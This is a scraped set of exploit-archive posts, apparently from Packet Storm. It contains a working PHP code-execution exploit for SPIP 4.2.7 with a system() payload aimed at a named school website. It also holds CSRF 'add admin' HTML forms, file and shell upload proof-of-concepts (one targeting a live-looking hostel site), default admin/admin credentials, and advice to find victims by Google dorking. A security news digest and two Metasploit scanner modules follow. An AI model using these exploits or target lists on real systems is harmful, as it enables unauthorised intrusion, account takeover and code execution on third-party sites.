SPIP version 4.2.7 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.7 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.7 Code Execution

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Loan Management System 2024 1.0 Insecure Settings**

Posted Sep 2, 2024

Authored by indoushka

Loan Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4e37e483991ec7b37ab54ed035920c62f7033979ca509714b26270c8fabb131b

Download | Favorite | View

**Loan Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Loan Management System 2024 v1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15529/loan-management-system-oop-php-mysqlijquery-free-source-code.html                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin[+] https://www/127.0.0.1/165.232.176.12/index.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,597)
*   Arbitrary (17,025)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,867)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,418)
*   DoS (25,183)
*   Encryption (2,389)
*   Exploit (54,093)
*   File Inclusion (4,271)
*   File Upload (1,006)
*   Firewall (822)
*   Info Disclosure (2,910)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,249)
*   Local (14,833)
*   Magazine (587)
*   Overflow (13,203)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,651)
*   Remote (31,809)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,692)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,046)
*   Web (10,128)
*   Whitepaper (3,782)
*   x86 (969)
*   XSS (18,277)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (50,978)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,661)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,794)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,756)
*   Other

Loan Management System 2024 1.0 Insecure Settings

Hostel Management System version 1.0 version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : hostel management system 1.0 arbitrary file upload Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/hostel-management-system/                                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line : 9 Set your Target[+] Save As poc.html[+] payload :<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Complaint Form</title></head><body>    <form name="complaint" action="https://guardianpg.in/hostel/register-complaint.php" method="POST" enctype="multipart/form-data">        <label for="ctype">Complaint Type:</label>        <select name="ctype" id="ctype">            <option value="type1">Type 1</option>            <option value="type2">Type 2</option>            <option value="type3">Type 3</option>        </select><br><br>        <label for="cdetails">Complaint Details:</label><br>        <textarea name="cdetails" id="cdetails" rows="4" cols="50"></textarea><br><br>        <label for="image">Upload Image:</label>        <input type="file" name="image" id="image"><br><br>        <input type="submit" name="submit" value="Submit Complaint">    </form></body></html>[+] your Files : http://127.0.0.1/Hostel-Management-Syste-Updated-Code/hostel/comnplaintdoc/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Hostel Management System 1.0 Arbitrary File Upload

File Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : File Management System 1.0 CSRF Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 1 : Set your target.[+] Save As poc.html[+] Payload :  <form action="http://127.0.0.1/filemanagement/Private_Dashboard/create_Admin.php" method="POST">  <div class="modal-dialog" role="document">    <div class="modal-content">      <div class="modal-header text-center">        <h4 class="modal-title w-100 font-weight-bold"><i class="fas fa-user-plus"></i> Add Admin</h4>        <button type="button" class="close" data-dismiss="modal" aria-label="Close">          <span aria-hidden="true">&times;</span>        </button>      </div>      <div class="modal-body mx-3">           <div class="md-form mb-5">          <input type="hidden" id="orangeForm-name" name="status" value = "Admin" class="form-control validate">        </div>        <div class="md-form mb-5">          <i class="fas fa-user prefix grey-text"></i>          <input type="text" id="orangeForm-name" name="name" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-name">Your name</label>        </div>        <div class="md-form mb-5">          <i class="fas fa-envelope prefix grey-text"></i>          <input type="email" id="orangeForm-email" name="admin_user" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-email">Your email</label>        </div>        <div class="md-form mb-4">          <i class="fas fa-lock prefix grey-text"></i>          <input type="password" id="orangeForm-pass" name="admin_password" class="form-control validate" required="">          <label data-error="wrong" data-success="right" for="orangeForm-pass">Your password</label>        </div>      </div>      <div class="modal-footer d-flex justify-content-center">        <button class="btn btn-info" name="reg">Sign up</button>    Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Management System 1.0 Cross Site Request Forgery

Faculty Evaluation System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Faculty Evaluation System 1.0 CSRF Add Admin Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html                     |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 35 : Set your target.

[+] Save As poc.html

[+] Payload :

  <!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="email">User Name:</label>  
        <input type="email" id="email" name="email" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <div class="form-group">  
      <label for="" class="control-label">Avatar</label>  
      <div class="custom-file">  
              <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
              <label class="custom-file-label" for="customFile">Choose file</label>  
            </div>  
    </div>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/eval/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

[+] Shell Path : http://127.0.0.1/eval/assets/uploads/

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Faculty Evaluation System 1.0 Cross Site Request Forgery

eClass LMS version 6.2.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : eClass LMS v6.2.0 shell upload Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/eclass-learning-management-system/25613271                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] TAIF learning script contain arbitrary file upload[+] registered user can upload .php files in profile picture section without any security[+] profile link : localhost/demo/public/profile/show/[+] profile link : /demo/public/profile/show/[+] edit profile photo and upload php files and inspect element your php direction[+] uploaded file direction :local host /demo/public/images/user_img/16067501901.php <---- random id[+] just right click the photo and use inspect element you will have your directionGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

eClass LMS 6.2.0 Shell Upload

Free Hospital Management System for Small Practices version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Vaidya-Mitra v 1.0 CSRF Vulnerability  
                                                                   |  
| # Author    : indoushka  
                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1  
(64 bits)                                                            |  
| # Vendor    :  
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
                             |

=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin.

[+] Go to the line 9. Set the target site link Save changes and apply .

[+] infected file : vm/create-account.php.

[+] save code as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width,  
initial-scale=1.0">  
    <title>Create Account</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/vm/create-account.php" method="POST">  
        <label for="newemail">Email:</label>  
        <input type="email" id="newemail" name="newemail" required>  
        <br>

        <label for="tele">Telephone:</label>  
        <input type="text" id="tele" name="tele" required>  
        <br>

        <label for="newpassword">Password:</label>  
        <input type="password" id="newpassword" name="newpassword"  
required>  
        <br>

        <label for="cpassword">Confirm Password:</label>  
        <input type="password" id="cpassword" name="cpassword" required>  
        <br>

        <button type="submit">Create Account</button>  
    </form>  
</body>  
</html>

Greetings to  
:============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr  
|

==========================================================================

Free Hospital Management System For Small Practices 1.0 CSRF

A list of topics we covered in the week of August 26 to September 1 of 2024

August 30, 2024 - Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp

August 29, 2024 - A Google search ad for Canva is highly misleading and walks users into a trap.

August 29, 2024 - Telegram CEO Pavel Durov has been arrested in France which raises a lot of questions about the reasons behind the arrest.

August 28, 2024 - Ransomware gangs love sensitive data from healthcare and support organizations to increase their leverage on the victims

August 27, 2024 - Scammers are increasingly using toll fees as a lure in smishing attacks with the aim of grabbing victims' personal details and credit card information.

 A week in security (August 26 &#8211; September 1) 

Checks if an HTTP proxy is open. False positive are avoided verifying the HTTP return code and matching a pattern. The CONNECT method is verified only the return code. HTTP headers are shown regarding the use of proxy or load balancer.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::WmapScanServer  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'        => 'HTTP Open Proxy Detection',      'Description' => %q{        Checks if an HTTP proxy is open. False positive are avoided        verifying the HTTP return code and matching a pattern.        The CONNECT method is verified only the return code.        HTTP headers are shown regarding the use of proxy or load balancer.      },      'References'  =>        [          ['URL', 'https://en.wikipedia.org/wiki/Open_proxy'],          ['URL', 'https://svn.nmap.org/nmap/scripts/http-open-proxy.nse'],        ],      'Author'      => 'Matteo Cantoni <goony[at]nothink.org>',      'License'     => MSF_LICENSE    ))    register_options(      [        Opt::RPORT(8080),        OptBool.new('MULTIPORTS', [ false, 'Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123', false ]),        OptBool.new('VERIFYCONNECT', [ false, 'Enable CONNECT HTTP method check', false ]),        OptString.new('CHECKURL', [ true, 'The web site to test via alleged web proxy', 'http://www.google.com' ]),        OptString.new('VALIDCODES', [ true, "Valid HTTP code for a successfully request", '200,302' ]),        OptString.new('VALIDPATTERN', [ true, "Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request", '<TITLE>302 Moved</TITLE>' ]),      ])    register_wmap_options({      'OrderID' => 1,      'Require' => {},    })  end  def run_host(target_host)    check_url = datastore['CHECKURL']    if datastore['VERIFYCONNECT']      target_method = 'CONNECT'      # CONNECT doesn't need <scheme> but need port      check_url = check_url.gsub(/[http:\/\/|https:\/\/]/, '')      if check_url !~ /:443$/        check_url = check_url + ":443"      end    else      target_method = 'GET'      # GET only http request      check_url = check_url.gsub(/https:\/\//, '')      if check_url !~ /^http:\/\//i        check_url = 'http://' + check_url      end    end    target_ports = []    if datastore['MULTIPORTS']      target_ports = [ 80, 443, 1080, 3128, 8000, 8080, 8123 ]    else      target_ports.push(datastore['RPORT'].to_i)    end    target_proxy_headers = [ 'Forwarded', 'Front-End-Https', 'Max-Forwards', 'Via', 'X-Cache', 'X-Cache-Lookup', 'X-Client-IP', 'X-Forwarded-For', 'X-Forwarded-Host' ]    target_ports.each do |target_port|      verify_target(target_host,target_port,target_method,check_url,target_proxy_headers)    end  end  def verify_target(target_host,target_port,target_method,check_url,target_proxy_headers)    vprint_status("#{peer} - Sending a web request... [#{target_method}][#{check_url}]")    datastore['RPORT'] = target_port    begin      res = send_request_cgi(        'uri'     => check_url,        'method'  => target_method,        'version' => '1.1'      )      return if not res      vprint_status("#{peer} - Returns with '#{res.code}' status code [#{target_method}][#{check_url}]")      valid_codes = datastore['VALIDCODES'].split(/,/)      target_proxy_headers_results = []      target_proxy_headers.each do |proxy_header|        if (res.headers.to_s.match(/#{proxy_header}: (.*)/))          proxy_header_value = $1          # Ok...I don't like it but works...          target_proxy_headers_results.push("\n                          |_ #{proxy_header}: #{proxy_header_value}")        end      end      if target_proxy_headers_results.any?        proxy_headers = target_proxy_headers_results.join()      end      if datastore['VERIFYCONNECT']        # Verifying CONNECT we check only the return code        if valid_codes.include?(res.code.to_s)          print_good("#{peer} - Potentially open proxy [#{res.code}][#{target_method}]#{proxy_headers}")          report_note(            :host   => target_host,            :port   => target_port,            :method => target_method,            :proto  => 'tcp',            :sname  => (ssl ? 'https' : 'http'),            :type   => 'OPEN HTTP PROXY',            :data   => 'Open http proxy (CONNECT)'          )        end      else        # Verify return code && (headers.pattern or body.pattern)        if valid_codes.include?(res.code.to_s) && (res.headers.include?(datastore['VALIDPATTERN']) || res.body.include?(datastore['VALIDPATTERN']))          print_good("#{peer} - Potentially open proxy [#{res.code}][#{target_method}]#{proxy_headers}")          report_note(            :host   => target_host,            :port   => target_port,            :method => target_method,            :proto  => 'tcp',            :sname  => (ssl ? 'https' : 'http'),            :type   => 'OPEN HTTP PROXY',            :data   => 'Open http proxy (GET)'          )        end      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e      vprint_error("#{peer} - The port '#{target_port}' is unreachable!")      return nil    end  endend

HTTP Open Proxy Detection

This Metasploit module enumerates wireless access points through Chromecast.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name' => 'Chromecast Wifi Enumeration',      'Description' => %q{        This module enumerates wireless access points through Chromecast.      },      'Author' => ['wvu'],      'References' => [        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website      ],      'License' => MSF_LICENSE    ))    register_options([      Opt::RPORT(8008)    ])  end  def run_host(ip)    res = scan    return unless res && res.code == 200    waps_table = Rex::Text::Table.new(      'Header' => "Wireless Access Points from #{ip}",      'Columns' => [        'BSSID',        'PWR',        'ENC',        'CIPHER',        'AUTH',        'ESSID'      ],      'SortIndex' => -1    )    res.get_json_document.each do |wap|      waps_table << [        wap['bssid'],        wap['signal_level'],        enc(wap),        cipher(wap),        auth(wap),        wap['ssid'] + (wap['wpa_id'] ? ' (*)' : '')      ]    end    unless waps_table.rows.empty?      print_line(waps_table.to_s)      report_note(        :host => ip,        :port => rport,        :proto => 'tcp',        :type => 'chromecast.wifi',        :data => waps_table.to_csv      )    end  end  def scan    send_request_raw(      'method' => 'POST',      'uri' => '/setup/scan_wifi',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )    send_request_raw(      'method' => 'GET',      'uri' => '/setup/scan_results',      'agent' => Rex::Text.rand_text_english(rand(42) + 1)    )  end  def enc(wap)    case wap['wpa_auth']    when 1      'OPN'    when 2      'WEP'    when 5      'WPA'    when 0, 7      'WPA2'    else      wap['wpa_auth']    end  end  def cipher(wap)    case wap['wpa_cipher']    when 1      ''    when 2      'WEP'    when 3      'TKIP'    when 4      'CCMP'    else      wap['wpa_cipher']    end  end  def auth(wap)    case wap['wpa_auth']    when 0      'MGT'    when 5, 7      'PSK'    else      ''    end  endend

Tag

#google